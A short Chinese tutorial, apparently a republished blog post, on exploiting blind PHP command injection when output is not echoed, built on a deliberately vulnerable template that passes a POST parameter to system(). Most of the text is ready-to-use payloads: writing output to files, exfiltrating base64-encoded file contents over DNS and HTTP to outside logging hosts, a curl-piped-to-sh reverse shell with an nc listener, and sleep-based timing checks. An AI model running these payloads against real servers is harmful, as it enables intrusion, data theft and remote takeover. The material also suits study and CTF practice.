本文主要是介绍php--无回显情况下的命令执行,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
免责声明:本文仅做技术交流与学习...
目录
绕过模版:
1. 写入文件、二次返回:
2. DNS信道:
3.http信道:
4.反弹shell信道 -->公网IP
5.延时 sleep 3
建立通道(信道) --数据传输的路径
shell_exec 与 system 相比,shell_exec没有回显结果.
绕过模版:
<?php
echo "hello world";
# 命令执行:
$cmd=$_POST['cmd'];
system($cmd);?>
1. 写入文件、二次返回:
/?cmd=whoami>1.txt
再访问1.txt:
/?cmd=cat fl?g.php>1.txt
2. DNS信道:
dnslog.cn
/?cmd=ping -c 1 `执行命令`.域名 --1次解析
/?cmd=a=`sed -n "3,4p" fla?.php`;curl${a:0:10}.域名 --一次带出的字符有限./?cmd=a=`sed -n "3,4p" fla?.php`;curl${a:10:30}.域名
/?cmd=a=`sed -n "3,4p" fla?.php|base64`;curl${a:10:30}.域名 --base64编码
3.http信道:
https://requestrepo.com/#/
https://requestrepo.com/#/
(看get请求包)
/?cmd=curl http://域名/?1=`ls .|base64`
/?cmd=curl http://域名/?1=`cat fl?g.php|base64`
4.反弹shell信道 -->公网IP
https://your-shell.com/
https://your-shell.com/
(用微软的浏览器访问.)curl https://your-shell.com/<your公网ip>:1337 | sh
/?cmd=curl https://your-shell.com/<your公网ip>:1337 | sh
服务器: nc -lvvnp 1337
5.延时 sleep 3
--麻烦啊
&2=sleep 3 ||还可验证命令执行.
这篇关于php--无回显情况下的命令执行的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!